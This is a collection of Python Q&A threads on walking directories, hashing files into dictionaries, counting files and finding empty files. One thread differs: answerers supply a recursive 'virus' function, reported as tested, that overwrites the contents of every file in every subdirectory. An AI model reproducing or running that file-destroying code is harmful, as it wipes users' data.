Adding hashes and files names to lists and dictionaries - python

Hey guys, I was able to get the hashes to work individually for the files I input. I'm wondering how to add the file name to the list I have set up and the hash to the dictionary. I feel like it's a pretty simple fix; I'm just stuck. We have to use a file path on our machines that has been established already. The folder I'm using has 3 or 4 files in it. I'm just trying to figure out how to add each of the hashes to the lists. Thanks!
from __future__ import print_function
'''
Week Two Assignment 2 - File Hashing
'''
'''
Complete the script below to do the following:
1) Add your name, date, assignment number to the top of this script
2) Using the os library and the os.walk() method
a) Create a list of all files
b) Create an empty dictionary named fileHashes
c) Iterate through the list of files and
- calculate the md5 hash of each file
- create a dictionary entry where:
key = md5 hash
value = filepath
d) Iterate through the dictionary
- print out each key, value pair
3) Submit
NamingConvention: lastNameFirstInitial_Assignment_.ext
for example: hosmerC_WK1_script.py
hosmerC_WK1_screenshot.jpg
A) Screenshot of the results in WingIDE
B) Your Script
'''
import os
import hashlib
import sys
directory = "."
fileList = []
fileHashes = {}
# Psuedo Constants
SCRIPT_NAME = "Script: ASSIGNMENT NAME"
SCRIPT_AUTHOR = "Author: NAME"
SCRIPT_DATE = "Date: 25 January 2021"
print(SCRIPT_NAME)
print(SCRIPT_AUTHOR)
print(SCRIPT_DATE)
for root, dirs, files in os.walk(directory):
    # Walk the path from top to bottom.
    # For each file obtain the filename
    for fileName in files:
        path = os.path.join(root, fileName)
        fullPath = os.path.abspath(path)
print(files)
''' Determine which version of Python '''
if sys.version_info[0] < 3:
    PYTHON_2 = True
else:
    PYTHON_2 = False
def HashFile(filePath):
    '''
    function takes one input, a valid filePath
    returns the hexdigest of the file
    or error
    '''
    try:
        with open(filePath, 'rb') as fileToHash:
            fileContents = fileToHash.read()
            hashObj = hashlib.md5()
            hashObj.update(fileContents)
            digest = hashObj.hexdigest()
            return digest
    except Exception as err:
        return str(err)
print()
if PYTHON_2:
    fileName = raw_input("Enter file to hash: ")
else:
    fileName = input("Enter file to hash: ")

hexDigest = HashFile(fileName)
print(hexDigest)

Well, you've done most of the work in the assignment, so kudos to you for that. You just need to refine a few things and use your functions together.
For item "a) Create a list of all files": In the for fileName in files: loop, add the line fileList.append(fullPath). (See list.append() for more info.)
Indent it so it's part of the for loop.
Btw, the print(files) line you have is outside the loop so it will only print the files of the last folder that was os.walk'ed.
Change that to print(fileList)
For "c) Iterate through the list of files and...":
Iterate through the fileList and call the HashFile() function for each file. The return value is the key for your dictionary and the filepath is the value:
for filepath in fileList:
    filehash = HashFile(filepath)
    fileHashes[filehash] = filepath
The one-line version of that, using a dictionary comprehension:
fileHashes = {HashFile(filepath): filepath for filepath in fileList}
For "d) Iterate through the dictionary": I think you'll be able to manage that on your own. (See dict.items() for more info.)
Other notes:
A.) In the except block for calculating hashes, you return the error as a string - was that pre-written for you in the assignment or did you write it? If you wrote it, consider removing it, because that error message then becomes the hash of the file, since you're returning it. Possibly just print the error, unless you were instructed otherwise.
B.) The "input filename" part is not needed - you'll be calculating the hashes of all the files in the "current" directory where your script is executed (as shown above).
C.) Btw, since finding collisions is a known flaw of md5, you may want to store each dictionary value as a list of filepaths rather than a single one. Maybe it's part of the test. Or it can be safely ignored.
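Putting the pieces together, a minimal end-to-end sketch (reusing your fileList and fileHashes names, and printing errors rather than storing them, per note A) might look like:

```python
import os
import hashlib

directory = "."
fileList = []
fileHashes = {}

# a) collect the absolute path of every file under the directory
for root, dirs, files in os.walk(directory):
    for fileName in files:
        fileList.append(os.path.abspath(os.path.join(root, fileName)))

# c) hash each file, storing key = md5 hash, value = filepath
for filepath in fileList:
    try:
        with open(filepath, 'rb') as f:
            data = f.read()
    except OSError as err:
        print(err)  # report unreadable files instead of hashing the error text
        continue
    fileHashes[hashlib.md5(data).hexdigest()] = filepath

# d) print each key, value pair
for digest, path in fileHashes.items():
    print(digest, path)
```

This is only a sketch of the assembled steps, not the assignment's official solution.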

Related

how to loop through folders thoroughly? python

I'm new to python and get stuck by a problem I encountered while studying loops and folder navigation.
The task is simple: loop through a folder and count all '.txt' files.
I believe there may be some modules to tackle this task easily and I would appreciate it if you can share them. But since this is just a random question I encountered while learning python, it would be nice if this can be solved using the tools I just acquired, like for/while loops.
I used for and while clauses to loop through a folder. However, I'm unable to loop through a folder entirely.
Here is the code I used:
import os
count = 0 # set count default
path = 'E:\\' # set path
while os.path.isdir(path):
    for file in os.listdir(path): # loop through the folder
        print(file) # print text to keep track of the process
        if file.endswith('.txt'):
            count += 1
            print('+1')
        elif os.path.isdir(os.path.join(path, file)): # if it is a subfolder
            print(os.path.join(path, file))
            path = os.path.join(path, file)
            print('is dir')
            break
        else:
            path = os.path.join(path, file)
Since the number of files and subfolders in a folder is unknown, I think a while loop is appropriate here. However, my code has many errors or pitfalls I don't know how to fix. For example, if multiple subfolders exist, this code will only loop through the first subfolder and ignore the rest.
Your problem is that you quickly end up trying to look at non-existent files. Imagine a directory structure where a non-directory named A (E:\A) is seen first, then a file b (E:\b).
On your first loop, you get A, detect it does not end in .txt, and that it is a directory, so you change path to E:\A.
On your second iteration, you get b (meaning E:\b), but all your tests (aside from the .txt extension test) and operations concatenate it with the new path, so you test relative to E:\A\b, not E:\b.
Similarly, if E:\A is a directory, you break the inner loop immediately, so even if E:\c.txt exists, if it occurs after A in the iteration order, you never even see it.
Directory tree traversal code must involve a stack of some sort, either explicitly (by appending to and popping from a list of directories for eventual processing), or implicitly (via recursion, which uses the call stack to achieve the same purpose).
In any event, your specific case should really just be handled with os.walk:
for root, dirs, files in os.walk(path):
    print(root) # print text to keep track of the process
    count += sum(1 for f in files if f.endswith('.txt'))
    # This second line matches your existing behavior, but might not be intended
    # Remove it if directories ending in .txt should not be included in the count
    count += sum(1 for d in dirs if d.endswith('.txt'))
Just for illustration, the explicit stack approach to your code would be something like:
import os

count = 0 # set count default
paths = ['E:\\'] # Make stack of paths to process
while paths:
    # paths.pop() gets top of directory stack to process
    # os.scandir is easier and more efficient than os.listdir,
    # though it must be closed (but the with statement does this for us)
    with os.scandir(paths.pop()) as entries:
        for entry in entries: # loop through the folder
            print(entry.name) # print text to keep track of the process
            if entry.name.endswith('.txt'):
                count += 1
                print('+1')
            elif entry.is_dir(): # if it is a subfolder
                print(entry.path, 'is dir')
                # Add to paths stack to get to it eventually
                paths.append(entry.path)
You probably want to apply recursion to this problem. In short, you will need a function to handle directories that will call itself when it encounters a sub-directory.
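To illustrate that idea, a minimal recursive sketch (the function name is just an example) could look like:

```python
import os

def count_txt(path):
    # Count .txt files under `path`, descending into every subdirectory.
    count = 0
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if os.path.isdir(full):
            count += count_txt(full)  # the function calls itself on a subdirectory
        elif name.endswith('.txt'):
            count += 1
    return count
```

Usage would be something like `count = count_txt('E:\\')`, matching the path from the question.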
This might be more than you need, but it will allow you to list all the files within the directory that are .txt files but you can also add criteria to the search within the files as well. Here is the function:
def file_search(root, extension, search, search_type):
    import pandas as pd
    import os
    col1 = []
    col2 = []
    rootdir = root
    for subdir, dirs, files in os.walk(rootdir):
        for file in files:
            if "." + extension in file.lower():
                try:
                    with open(os.path.join(subdir, file)) as f:
                        contents = f.read()
                        if search_type == 'any':
                            if any(word.lower() in contents.lower() for word in search):
                                col1.append(subdir)
                                col2.append(file)
                        elif search_type == 'all':
                            if all(word.lower() in contents.lower() for word in search):
                                col1.append(subdir)
                                col2.append(file)
                except:
                    pass
    df = pd.DataFrame({'Folder': col1,
                       'File': col2})[['Folder', 'File']]
    return df
Here is an example of how to use the function:
search_df = file_search(root=r'E:\\',
                        search=['foo', 'bar'], # words to search for
                        extension='txt', # could change this to 'csv' or 'sql' etc.
                        search_type='all') # use any or all
search_df
The analysis of your code has already been addressed quite well by @ShadowRanger's answer.
I will try to address this part of your question:
there may be some modules to tackle this task easily
For this kind of task, there actually exists the glob module, which implements Unix-style pathname pattern expansion.
To count the number of .txt files in a directory and all its subdirectories, one may simply use the following:
import os
from glob import iglob, glob
dirpath = '.' # for example
# getting all matching elements in a list and computing its length
len(glob(os.path.join(dirpath, '**/*.txt'), recursive=True))
# 772
# or iterating through all matching elements and summing 1 each time a new item is found
# (this approach is more memory-efficient)
sum(1 for _ in iglob(os.path.join(dirpath, '**/*.txt'), recursive=True))
# 772
Basically glob.iglob() is the iterator version of glob.glob().
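On the same theme, the standard-library pathlib module offers Path.rglob(), which does the recursive matching for you; a quick sketch:

```python
from pathlib import Path

dirpath = '.'  # for example

# rglob('*.txt') recursively yields every matching path under dirpath
count = sum(1 for _ in Path(dirpath).rglob('*.txt'))
print(count)
```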
For nested directories it's easier to use functions like os.walk.
Take this for example:
subfiles = []
for dirpath, subdirs, files in os.walk(path):
    for x in files:
        if x.endswith(".txt"):
            subfiles.append(os.path.join(dirpath, x))
and it'll return a list of all txt files.
Otherwise you'll need to use recursion for tasks like this.

Given a filename, go to the next file in a directory

I am writing a method that takes a filename and a path to a directory and returns the next available filename in the directory or None if there are no files with names that would sort after the file.
There are plenty of questions about how to list all the files in a directory or iterate over them, but I'm not sure whether the best solution for finding a single next filename is to generate that list, find the location of the current file in it, and choose the next element (or None if we're already on the last one).
EDIT: here's my current file-picking code. It's reused from a different part of the project, where it is used to pick a random image from a potentially nested series of directories.
# picks a file from a directory
# if the file is also a directory, pick a file from the new directory
# this might choke up if it encounters a directory only containing invalid files
def pickNestedFile(directory, bad_files):
    file = None
    while file is None or file in bad_files:
        file = random.choice(os.listdir(directory))
        #file = directory + file # use the full path name
        print("Trying " + file)
    if os.path.isdir(os.path.join(directory, file)) == True:
        print("It's a directory!")
        return pickNestedFile(directory + "/" + file, bad_files)
    else:
        return directory + "/" + file
The program I am using this in now is to take a folder of chatlogs, pick a random log, starting position, and length. These will then be processed into a MOTD-like series of (typically) short log snippets. What I need the next-file picking ability for is when the length is unusually long or the starting line is at the end of the file, so that it continues at the top of the next file (a.k.a. wrap around midnight).
I am open to the idea of using a different method to choose the file, since the above method does not give a separate filename and directory discretely, and I'd have to use a listdir and match to get an index anyway.
You should probably consider rewriting your program to not have to use this. But this would be how you could do it:
import os

def nextFile(filename, directory):
    fileList = os.listdir(directory)
    nextIndex = fileList.index(filename) + 1
    if nextIndex == 0 or nextIndex == len(fileList):
        return None
    return fileList[nextIndex]

print(nextFile("mail", "test"))
I tweaked the accepted answer to allow new files to be added to the directory on the fly and for it to work if a file is deleted or changed or doesn't exist. There are better ways to work with filenames/paths, but the example below keeps it simple. Maybe it's helpful:
import os

def next_file_in_dir(directory, current_file=None):
    file_list = os.listdir(directory)
    next_index = 0
    if current_file in file_list:
        next_index = file_list.index(current_file) + 1
        if next_index >= len(file_list):
            next_index = 0
    return file_list[next_index]
file_name = None
directory = "videos"
user_advanced_to_next = True
while user_advanced_to_next:
    file_name = next_file_in_dir(directory=directory, current_file=file_name)
    user_advanced_to_next = play_video("{}/{}".format(directory, file_name))
finish_and_clean_up()

Finding and printing file name of zero length files in python

I'm learning about the os module and I need to work out how to print the file names of only zero-length files, and the count.
So far I've figured the easiest way to do it is to generate a list or a tuple of files and their sizes in this format:
(('zerotextfile1.txt', 0), ('notazerotextfile.txt', 15))
Then use an if statement to only print out only files with zero length.
Then use a sum function to add the number of list items to get the count of zero length files.
So far, I've got bits and pieces - it's how to put them together I'm having trouble with.
Some of my bits (viable code I've managed to write, not much, I know):
import os

place = 'C:\\Users\\Me\\Documents\\Python Programs\\'
for files in os.walk(place):
    print(files)
Then there is stuff like os.path.getsize() which requires I put in a filename, so I figure I've got to use a for loop to print a list of the file names in this function in order to get it to work, right?
Any tips or pointing in the right direction would be vastly appreciated!
import os

place = 'C:\\Users\\Me\\Documents\\Python Programs\\'
for root, dirs, files in os.walk(place):
    for f in files:
        file_path = os.path.join(root, f) # Full path to the file
        size = os.path.getsize(file_path) # pass the full path to getsize()
        if size == 0:
            print(f, file_path)
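To also get the count the question asked for, the same walk can collect the zero-length paths into a list and sum them in one pass (a sketch, written for Python 3; the path is the example one from the question):

```python
import os

place = 'C:\\Users\\Me\\Documents\\Python Programs\\'  # example path from the question
zero_length = []
for root, dirs, files in os.walk(place):
    for f in files:
        file_path = os.path.join(root, f)
        if os.path.getsize(file_path) == 0:  # keep only zero-length files
            zero_length.append(file_path)

for p in zero_length:
    print(p)
print(len(zero_length), "zero-length files")
```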
Are you looking for the following? (Note: each item yielded by os.walk is a (root, dirs, filenames) tuple, and this only checks the first file of each folder.)
import os

place = 'C:\\Users\\Me\\Documents\\Python Programs\\'
for files in os.walk(place):
    if os.path.getsize(files[0] + '\\' + files[2][0]) == 0:
        print(files)

Listing Directories In Python Multi Line

I need help trying to list directories in Python. I am trying to code a Python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directories I can infect the first file that is listed, then the second, and so on.
I don't want to use the ls command because I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
    print(item) # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
    VIRUS = "THIS FILE IS NOW INFECTED"
    if directory[-1] == "/": # making sure directory can be concatenated with file
        pass
    else:
        directory = directory + "/" # making sure directory can be concatenated with file
    files = os.listdir(directory)
    for i in files:
        location = directory + i
        if os.path.isfile(location):
            with open(location, 'w') as f:
                f.write(VIRUS)
        elif os.path.isdir(location):
            virus(directory=location) # running the function again on a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
The reason I have the default as directory=os.getcwd() is because you originally were using ".", which listdir treats as the current working directory's files. I needed the actual directory name in order to pull the nested directories.
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had its content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os

VIRUS = "some text"
data = os.listdir(".") # returns a list of files and directories
for x in data: # iterate over the list
    if os.path.isfile(x): # if the current item is a file then perform the write operation
        # use the `with` statement for handling files, it automatically closes the file
        with open(x, 'w') as f:
            f.write(VIRUS)

Incomplete loading of a dictionary

Disclosure: I am new to python. I am trying to load a dictionary with files using the hash value as my key and the file path as my value. I added a counter to ensure the dictionary was properly loaded. After running the code below, I have 78 files (Counter) but only 47 for my dictionary length. Why did it not load all 78 files? Any help is greatly appreciated!
for dirname, dirnames, filenames in os.walk('.'):
    for subdirname in dirnames:
        os.path.join(dirname, subdirname)
    for filename in filenames:
        m1 = hashlib.md5(filename)
        hValue = m1.hexdigest()
        pValue = os.path.join(dirname, filename)
        myDict[(hValue)]=pValue
        counter += 1
print len(myDict), "Dict Length"
print counter, "counter"
You call os.path.join but don't keep the value, so your first nested for loop is useless. I'm not sure what it was meant to do.
You don't need to create an md5 hash of the filename, just use the filename as the key for the dict.
You are probably missing entries because you have files with the same name in different directories. Use os.path.join(dirname, filename) as the key for the dict.
Update: you're hashing the filename. To hash the contents:
m1 = hashlib.md5(open(filename).read())
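As a side note, open(filename).read() pulls the whole file into memory; for large files, hashing in fixed-size chunks is lighter. A sketch (the function name and chunk size are arbitrary choices):

```python
import hashlib

def md5_of_file(path, chunk_size=65536):
    # Feed the file to md5 in chunks so large files never load into memory at once.
    h = hashlib.md5()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(chunk_size), b''):
            h.update(chunk)
    return h.hexdigest()
```

Because md5.update() can be called repeatedly, this produces exactly the same digest as hashing the whole contents in one call.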
The dictionary keys need to be unique (or you will just overwrite the value corresponding to the key), and uniqueness isn't guaranteed by your method.
Since you're just hashing the filenames, if your filenames aren't unique, your hashes won't be either. Try hashing the full path.
Disclaimer: this is my first answer on Stack Overflow :)
Hi @Jarid F,
I tried writing a complete program so that you can run it and see for yourself. Here's the code:
import os
import hashlib

myDict = {}
counter = 0
for dirname, dirnames, filenames in os.walk('.'):
    for filename in filenames:
        # get the complete file location so that it's unique
        filename_with_path = os.path.join(dirname, filename)
        m1 = hashlib.md5(filename_with_path)
        # to hash the content of the file:
        # m1 = hashlib.md5(open(filename_with_path).read())
        hValue = m1.hexdigest()
        myDict[hValue] = filename_with_path
        counter += 1
print len(myDict), "Dict Length"
print counter, "counter"
assert counter == len(myDict)
To add on to a few points which @Ned Batchelder has provided:
The line myDict[(hValue)]=pValue is actually the same as myDict[hValue] = pValue, but I recommend not adding the parentheses; that will cause confusion later when you start working with tuples.
Hashing the content of the file may not be what you want, since two different files with the same content (like 2 empty files) will yield the same hash value. I guess that defeats the purpose you're trying to achieve here. If I may suggest instead, you could take hash(hash(file_location) + hash(file_content) + some_secret_key) to make the hash key better. (Please pardon my caution in adding the secret key as an extra security measure.)
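A rough sketch of that combined-key idea (the function name and the secret key here are made-up placeholders, and md5 is kept only to match the rest of the thread):

```python
import hashlib

SECRET_KEY = b'some-secret'  # placeholder; not a real security measure on its own

def combined_key(file_location):
    # Hash of path-hash + content-hash + secret, per the suggestion above.
    path_hash = hashlib.md5(file_location.encode()).hexdigest()
    with open(file_location, 'rb') as f:
        content_hash = hashlib.md5(f.read()).hexdigest()
    outer = hashlib.md5(path_hash.encode() + content_hash.encode() + SECRET_KEY)
    return outer.hexdigest()
```

Two empty files at different paths now get different keys, since the path hash differs. For anything beyond a class exercise, hashlib.sha256 together with the hmac module would be the more standard choice for keyed hashing.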
Good luck with your code & welcome to python!
